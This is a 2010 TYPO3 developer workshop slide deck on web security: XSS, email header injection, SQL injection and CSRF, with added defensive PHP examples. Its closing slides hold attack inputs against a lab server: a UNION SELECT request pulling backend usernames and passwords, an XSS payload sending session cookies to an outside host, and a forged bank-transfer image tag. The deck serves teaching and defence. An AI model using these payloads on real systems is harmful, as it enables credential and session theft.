TYPO3 Developer Days - Elmshorn 2010
Security Workshop
Inspiring people to share

T3DD10 Security
Security flaws versus Security concepts
02.07.2010



Helmut Hummel <helmut@typo3.org>
Introduction

Do you ...
   ... know me?

   ... have a working development environment?

   ... ever heard of XSS?

   ... ever heard of SQLi?

   ... ever heard of CSRF?

   ... ever found a vulnerability in a TYPO3 extension?

   ... reported your findings to security@typo3.org?

Did you ever hack for




Security Flaws versus Security Concepts


Agenda
   General Security Concepts

   Hacking / Code Review Session

   Getting into details about some vulnerability types

   Writing down best practices for TYPO3 developers

What is Security?




Security is not a state




What is Security?


Security is a process
   The security of an application must be proven over time

   Security must constantly be improved

   An application can never be secure ...

   ... but only not insecure at a particular time

   The "costs" of security must relate to the possible impacts

What is Security?


General Security Concepts
   Minimize Exposure / Least privilege

   Don't trust user data, don't trust services

   Filter -> Validate -> Escape: never mix them up

   Defense in depth

   Positive Security Model (whitelist)

   Use logging

   Avoid security by obscurity

Cross Site Scripting (XSS)




Cross Site Scripting


XSS
   Persistent / non-persistent XSS

   Injecting Up / Break out of the current DOM context

   Injecting Down

      Stay in the current context, but use the possibilities

      <img src="javascript:alert(document.cookie)" />

Cross Site Scripting


Preventing XSS




Cross Site Scripting


Preventing XSS
   Input validation and/or filtering is not enough

   Escape correctly, depending on the context

   <script>...NEVER PUT UNTRUSTED DATA HERE...</script>

      <img src="... OR HERE ..." />

      ... because then you're doomed

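The following PHP is an added example, not code from the slides or from TYPO3. It serves two slides at once: the general concept "Filter -> Validate -> Escape, never mix them up", and the rule above that escaping must fit the output context. All function names and the sample inputs are this example's own; the URL check is what stops the slide's `javascript:` image source, which plain HTML escaping leaves untouched.

```php
<?php
// Added example, not code from the slides or from TYPO3: the three separate
// steps Filter -> Validate -> Escape, with the escaping rule chosen per output
// context. All function names and the sample inputs are this example's own.
declare(strict_types=1);

// Step 1, filter: normalise the raw value (drop control characters, trim).
// Filtering never makes data "safe"; it only removes what can never be wanted.
function filterInput(string $raw): string
{
    return trim((string) preg_replace('/[\x00-\x1F\x7F]/', '', $raw));
}

// Step 2, validate: positive model (whitelist). Reject, never repair.
function isValidDisplayName(string $name): bool
{
    // Letters of any script, combining marks, spaces, hyphens, apostrophes.
    return preg_match('/^[\p{L}\p{M} \'-]{1,64}\z/u', $name) === 1;
}

// Step 3, escape for the context being written to.

// Element content and quoted attribute values share one rule. ENT_QUOTES
// matters: an unescaped quote closes the attribute, which is the
// "injecting up" break-out from the slides.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// URL-valued attributes (src, href) need more than escapeHtml(): the payload
// javascript:alert(document.cookie) contains nothing htmlspecialchars() would
// touch ("injecting down"), so the scheme is whitelisted before escaping.
function escapeUrlAttr(string $url): ?string
{
    $url = filterInput($url);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if ($scheme === null) {
        // No scheme: allow a same-origin absolute path only ("//host" is not one).
        $ok = $url !== '' && $url[0] === '/' && substr($url, 0, 2) !== '//';
        return $ok ? escapeHtml($url) : null;
    }
    if (!in_array(strtolower((string) $scheme), ['http', 'https'], true)) {
        return null;
    }
    return escapeHtml($url);
}

// The name reaches JavaScript only through a data attribute read via dataset,
// so untrusted data is never written between <script> tags.
function renderGreeting(string $rawName, string $rawAvatarUrl): string
{
    $name = filterInput($rawName);
    if (!isValidDisplayName($name)) {
        return '<p class="error">Invalid name.</p>';
    }
    $avatar = escapeUrlAttr($rawAvatarUrl);
    $img = $avatar === null ? '' : '<img src="' . $avatar . '" alt="">';
    return '<p data-name="' . escapeHtml($name) . '">Hello, ' . escapeHtml($name) . '!</p>'
        . $img
        . '<script>console.log(document.querySelector("p[data-name]").dataset.name);</script>';
}

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs: a legitimate name, an attribute break-out
    // attempt, and the slide's javascript: URL as the avatar source.
    echo renderGreeting('Maria Müller-O\'Neil', '/images/maria.png'), PHP_EOL;
    echo renderGreeting('" onmouseover="alert(1)', '/images/x.png'), PHP_EOL;
    echo renderGreeting('Maria', 'javascript:alert(document.cookie)'), PHP_EOL;
}
```

Run it with `php example.php`. The design point is that each step has one job: filtering removes what can never be wanted, validation rejects what does not fit the whitelist, and escaping happens at the very end for the exact context being written. None of the three is allowed to substitute for another, which is what the slide's "never mix them up" warns against.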
Email Header Injection




Email Header Injection


Email Header Injection
   PHP mail() function and From: header

   Use filter_var($mail, FILTER_VALIDATE_EMAIL)

   do not allow chr(10) or chr(13)




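An added PHP example (not from the slides or from TYPO3) of the three points on this slide applied to a contact form: the address is validated with `filter_var()`, and every field that ends up in a header is refused if it carries chr(10) or chr(13). Function names and the sample inputs are this example's own.

```php
<?php
// Added example, not code from the slides or from TYPO3: assembling mail()
// headers from form input so that the input cannot add header lines of its own.
// Function names and the sample inputs are this example's own.
declare(strict_types=1);

// Anything that ends the current header line lets the rest of the value start a
// new one (Bcc:, Content-Type:, ...). CR is chr(13), LF is chr(10); NUL is
// refused as well because it is never legitimate in a header.
function containsHeaderBreak(string $value): bool
{
    return preg_match('/[\r\n\0]/', $value) === 1;
}

// One address, validated with the built-in filter. It fails on a value such as
// "maria@example.org\nBcc: everyone@example.org", so that never reaches mail().
function validAddress(string $address): ?string
{
    $address = trim($address);
    return filter_var($address, FILTER_VALIDATE_EMAIL) === false ? null : $address;
}

// Additional headers for mail(); null when any field is unsafe.
function buildMailHeaders(string $fromName, string $fromAddress): ?string
{
    $address = validAddress($fromAddress);
    if ($address === null || containsHeaderBreak($fromName)) {
        return null;
    }
    // The display name goes into a quoted-string: drop quotes and backslashes
    // instead of trying to escape them.
    $name = str_replace(['"', '\\'], '', $fromName);
    return "From: \"{$name}\" <{$address}>\r\n"
        . "Reply-To: {$address}";
}

// The subject is a header too, so it gets the same line-break check as the name.
function sendContactMail(string $to, string $subject, string $body, string $fromName, string $fromAddress): bool
{
    if (validAddress($to) === null || containsHeaderBreak($subject)) {
        return false;
    }
    $headers = buildMailHeaders($fromName, $fromAddress);
    return $headers !== null && mail($to, $subject, $body, $headers);
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: a clean pair, an injected Bcc line inside the name,
    // and the same injection inside the address.
    var_dump(buildMailHeaders('Maria', 'maria@example.org'));
    var_dump(buildMailHeaders("Maria\r\nBcc: everyone@example.org", 'maria@example.org'));
    var_dump(buildMailHeaders('Maria', "maria@example.org\nBcc: everyone@example.org"));
}
```

The check is deliberately a rejection, not a cleanup: stripping the line breaks and sending anyway would silently accept a value that was clearly not typed by a legitimate user, and would hide the attempt from the logs the earlier "Use logging" slide asks for.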
SQL Injection (SQLi)




SQL Injection


SQLi
   (Blind) SQL injections

   Timing attacks

   UNION SELECT

      Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0 from be_users where admin in(1)

   Check your TypoScript!

SQL Injection


Prevent SQLi




SQL Injection


Prevent SQLi
   Prepared Statements / PDO

   Escaping

   Typecasting (intval), whitelist validation

   Using an ORM (extbase, FLOW3, QCodo, ...)

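An added PHP example (not code from the slides or from TYPO3) showing the first three items of this slide on a single query: a PDO prepared statement for values, an integer cast for the page id, and a whitelist for the one thing a parameter cannot protect, the column name in ORDER BY. Table and column names, the MySQL DSN and the request values are this example's own; the demo at the bottom runs on an in-memory SQLite database so it can be executed without a server.

```php
<?php
// Added example, not code from the slides or from TYPO3: the slide's techniques
// on one query. Table and column names, the MySQL DSN and the sample request
// values are this example's own; the demo at the bottom runs on in-memory SQLite.
declare(strict_types=1);

// Whitelist: the only column names a request may choose for sorting.
const SORTABLE_COLUMNS = ['title', 'crdate', 'tstamp'];

// Production connection (assumed DSN). Emulated prepares are disabled so the
// server binds the values itself instead of PDO interpolating them client-side.
function connectMysql(string $user, string $password): PDO
{
    return new PDO('mysql:host=localhost;dbname=typo3;charset=utf8mb4', $user, $password, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// A bound value is safe from injection but not from LIKE metacharacters;
// %, _ and the chosen escape character ! are escaped so they match literally.
function escapeLikeTerm(string $term): string
{
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
}

function loadRecords(PDO $pdo, array $get): array
{
    // Typecasting: whatever was sent, pid is an integer before it meets SQL.
    $pid = (int) ($get['pid'] ?? 0);

    // Whitelist validation: identifiers cannot be bound as parameters, so a
    // client-chosen column is accepted only from the fixed list.
    $sort = $get['sort'] ?? '';
    $orderBy = in_array($sort, SORTABLE_COLUMNS, true) ? $sort : 'crdate';

    // Prepared statement: the search term never becomes SQL text, so
    // "' OR 1=1 --" or "1 UNION SELECT ..." is just a string nothing matches.
    $term = is_string($get['q'] ?? null) ? $get['q'] : '';
    $sql = "SELECT uid, title FROM tx_example_item WHERE pid = :pid"
         . " AND title LIKE :title ESCAPE '!' ORDER BY {$orderBy}";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':pid', $pid, PDO::PARAM_INT);
    $stmt->bindValue(':title', '%' . escapeLikeTerm($term) . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Escaping, for code that still assembles SQL as a string: every string value
// is quoted by the driver and every integer is cast. Use this only where a
// prepared statement is not available.
function legacyWhere(PDO $pdo, string $title, string $uid): string
{
    return 'title = ' . $pdo->quote($title) . ' AND uid = ' . (int) $uid;
}

if (PHP_SAPI === 'cli') {
    // Self-contained demo with constructed rows on SQLite.
    $pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $pdo->exec('CREATE TABLE tx_example_item (uid INTEGER PRIMARY KEY, pid INTEGER, title TEXT, crdate INTEGER, tstamp INTEGER)');
    $pdo->exec("INSERT INTO tx_example_item VALUES (1, 5, 'Security workshop', 1, 1), (2, 5, 'Agenda', 2, 2), (3, 7, 'Other page', 3, 3)");

    // A normal request, then one whose pid, search term and sort column all
    // carry injection attempts: the cast keeps the leading 5, the term is
    // searched for literally, and the sort column falls back to crdate.
    print_r(loadRecords($pdo, ['pid' => '5', 'q' => 'work', 'sort' => 'title']));
    print_r(loadRecords($pdo, ['pid' => '5 UNION SELECT 1', 'q' => "' OR 1=1 --", 'sort' => 'title; DROP TABLE x']));
    echo legacyWhere($pdo, "O'Neil", '7 OR 1=1'), PHP_EOL;
}
```

The `ESCAPE '!'` clause is there because `%` and `_` in a bound search term are still LIKE wildcards; binding removes the injection risk but not the semantics of the operator. The ORDER BY whitelist is the part people most often forget: no driver can bind an identifier, so a sort column taken from the request is either matched against a fixed list or it is an injection point.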
Cross Site Request Forgery




Cross Site Request Forgery


CSRF
   Executing arbitrary actions on behalf of a victim

      <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">

   Stored CSRF (like XSS)

   Targeted emails

   Probably requires some kind of social engineering

Cross Site Request Forgery


Prevent CSRF
   Limiting to POST and checking the Referer is not enough

   Double Submit Cookies

   Challenge-Response

   Synchronizer Token Pattern

   No Cross-Site Scripting (XSS) vulnerabilities
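An added PHP example (not code from the slides or from TYPO3) of two of the defences listed on this slide: the Synchronizer Token Pattern with the secret held in the session, and the Double Submit Cookie variant for endpoints that keep no server-side state. Function names, the field and cookie names and the constructed requests are this example's own.

```php
<?php
// Added example, not code from the slides or from TYPO3: the Synchronizer Token
// Pattern, and the Double Submit Cookie variant for endpoints without session
// state. Function names, field names and the constructed requests are this
// example's own.
declare(strict_types=1);

// --- Synchronizer Token Pattern: the secret is kept server-side in the session
// and copied into every form the server renders.

function csrfToken(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256 unguessable bits
    }
    return $session['csrf_token'];
}

// Hidden field for the form; the token is attribute-escaped like any output.
function csrfField(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Checked on every state-changing request. Requiring POST is necessary (the
// <img> from the slide can only send GET) but not sufficient: a form on the
// attacker's page can POST too. What that page cannot do is read the token.
function verifySynchronizerToken(array $session, array $post, string $method): bool
{
    if ($method !== 'POST' || !isset($session['csrf_token'], $post['csrf_token'])) {
        return false;
    }
    // hash_equals() compares in constant time, so timing gives nothing away.
    return is_string($post['csrf_token']) && hash_equals($session['csrf_token'], $post['csrf_token']);
}

// --- Double Submit Cookie: no server-side state. The same random value is set
// as a cookie and written into the form; another origin can make the browser
// send the cookie, but cannot read it to copy it into the request body.

function issueDoubleSubmitToken(): string
{
    $token = bin2hex(random_bytes(32));
    setcookie('csrf_cookie', $token, [
        'secure' => true, 'httponly' => true, 'samesite' => 'Strict', 'path' => '/',
    ]);
    return $token; // the caller renders it as the csrf_token hidden field
}

function verifyDoubleSubmit(array $cookie, array $post, string $method): bool
{
    if ($method !== 'POST' || !isset($cookie['csrf_cookie'], $post['csrf_token'])) {
        return false;
    }
    return is_string($cookie['csrf_cookie']) && is_string($post['csrf_token'])
        && strlen($cookie['csrf_cookie']) === 64
        && hash_equals($cookie['csrf_cookie'], $post['csrf_token']);
}

if (PHP_SAPI === 'cli') {
    // Constructed requests against an in-memory "session": the genuine token on
    // POST and on GET, a forged form without a token, and the double-submit
    // check with a matching and with a guessed token.
    $session = [];
    $token = csrfToken($session);
    var_dump(verifySynchronizerToken($session, ['csrf_token' => $token], 'POST'));
    var_dump(verifySynchronizerToken($session, ['csrf_token' => $token], 'GET'));
    var_dump(verifySynchronizerToken($session, [], 'POST'));
    var_dump(verifyDoubleSubmit(['csrf_cookie' => $token], ['csrf_token' => $token], 'POST'));
    var_dump(verifyDoubleSubmit(['csrf_cookie' => $token], ['csrf_token' => 'guess'], 'POST'));
}
```

The last bullet of the slide is the caveat for both patterns: a script injected through an XSS bug on the same origin can read the hidden field (and, without HttpOnly, the cookie) and submit a correctly tokenised request, so the token is only as strong as the site's XSS defences. The double-submit variant additionally relies on no other host on the same registrable domain being able to set the cookie, which is why it is the weaker of the two and why the SameSite attribute is set.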
More Application Vulnerabilities
   Information Disclosure

   HTTP Response Splitting

   Path Traversal

   Privilege Escalation

   Session Fixation

   LDAP Injection

   Remote Code Execution
T3DD10 Security Workshop


Resources
   PHP-Sicherheit (Christopher Kunz and Stefan Esser)

   Essential PHP Security (Chris Shiflett)

   http://www.owasp.org/

   http://www.ibm.com/developerworks/opensource/library/os-php-secure-apps/index.html

   http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

T3DD10 Security Workshop


SQLi Exploit
   http://192.168.100.139/introductionpackage/
   t3dd10/pi1/?
   no_cache=1&tx_coolextension_pi1[showUid]=1%2
   0UNION%20SELECT%20uid,%20pid,%20tstamp,
   %20crdate,%20cruser_id,uid%20as
   %20t3ver_oid,uid%20as%20t3ver_id,uid%20as
   %20t3ver_wsid,uid%20as%20t3ver_label,uid%20as
   %20t3ver_state,%20uid%20as%20t3ver_stage,uid
   %20as%20t3ver_count,uid%20as
   %20t3ver_tstamp,uid%20as%20t3_origuid,uid
   %20as%20sys_language_uid,uid%20as
   %20l10n_parent,uid%20as
   %20l10n_diffsource,deleted,disable%20as
   %20hidden,starttime,endtime,%20usergroup%20as
   %20fe_group,username%20as
T3DD10 Security Workshop


XSS Exploit
   http://192.168.100.139/introductionpackage/
   t3dd10/pi2/?
   no_cache=1&tx_coolextension_pi2[name]=
   %22+type%3D%22hidden%22%2F%3E%3Cscript
   %3Ewindow.location.href+%3D+%27http%3A%2F
   %2Ftypo3.org%2F%3Fcookie%3D%27+%2B
   +document.cookie%3B%3C%2Fscript%3E
T3DD10 Security Workshop


XSS Exploit
   bit.ly/bpJzpF

   http://192.168.100.139/introductionpackage/
   t3dd10/pi2/?
   no_cache=1&tx_coolextension_pi2[name]=
   %22+type%3D%22hidden%22%2F%3E%3C%2Fform
   %3E%3Cform+action%3D%22http%3A%2F
   %2Ftypo3.org%22%3E%3Cinput+type%3D%22text
   %22+name%3D%22name
inspiring people to share.

Más contenido relacionado

Similar a T3DD10 Security Workshop

Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoidslicklash
 
TYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and MitigationTYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and MitigationHelmut Hummel
 
Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)AashishTanania
 
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecurityDistributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecuritySounil Yu
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developersmatthewhughes
 
The Principles of Secure Development - David Rook
The Principles of Secure Development - David RookThe Principles of Secure Development - David Rook
The Principles of Secure Development - David RookSecurity B-Sides
 
Reversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future RoadmapReversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future Roadmapsecurityxploded
 
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Edureka!
 
The Next Generation Security
The Next Generation SecurityThe Next Generation Security
The Next Generation SecurityCybera Inc.
 
Integrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud SecurityIntegrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud SecurityMaryJWilliams2
 
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...MaryJWilliams2
 
This World of Ours
This World of OursThis World of Ours
This World of Oursslicklash
 
So... you want to be a security consultant
So... you want to be a security consultant So... you want to be a security consultant
So... you want to be a security consultant abnmi
 
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...Michael Noel
 
CYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiCYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiashwanip7461
 
Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020JayTymchuk
 
CMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docxCMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docxmccormicknadine86
 

Similar a T3DD10 Security Workshop (20)

Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
 
Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014Security & App Development - CSO Summit Mid 2014
Security & App Development - CSO Summit Mid 2014
 
TYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and MitigationTYPO3 Security - Risks and Mitigation
TYPO3 Security - Risks and Mitigation
 
Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)Cyber Security Presentation By(Aashish Tanania)
Cyber Security Presentation By(Aashish Tanania)
 
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecurityDistributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developers
 
The Principles of Secure Development - David Rook
The Principles of Secure Development - David RookThe Principles of Secure Development - David Rook
The Principles of Secure Development - David Rook
 
Reversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future RoadmapReversing & Malware Analysis Training Part 13 - Future Roadmap
Reversing & Malware Analysis Training Part 13 - Future Roadmap
 
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
Cybersecurity Interview Questions and Answers | CyberSecurity Interview Tips ...
 
The Next Generation Security
The Next Generation SecurityThe Next Generation Security
The Next Generation Security
 
Integrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud SecurityIntegrating OMS and Azure Security Center for Enhanced Cloud Security
Integrating OMS and Azure Security Center for Enhanced Cloud Security
 
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
Maximizing Cloud Security and Efficiency: A Guide to Integrating OMS and Azur...
 
This World of Ours
This World of OursThis World of Ours
This World of Ours
 
So... you want to be a security consultant
So... you want to be a security consultant So... you want to be a security consultant
So... you want to be a security consultant
 
Check Point Consolidation
Check Point ConsolidationCheck Point Consolidation
Check Point Consolidation
 
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
You are Doing IT Security Wrong - Understanding the Threat of Modern Cyber-at...
 
CYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadiCYBER CRIME Presentation npccsm college kadi
CYBER CRIME Presentation npccsm college kadi
 
Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020Charting a Career in Information Security - August 2020
Charting a Career in Information Security - August 2020
 
CMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docxCMST&210 Pillow talk Position 1 Why do you think you may.docx
CMST&210 Pillow talk Position 1 Why do you think you may.docx
 

Último

"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 

Último (20)

"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
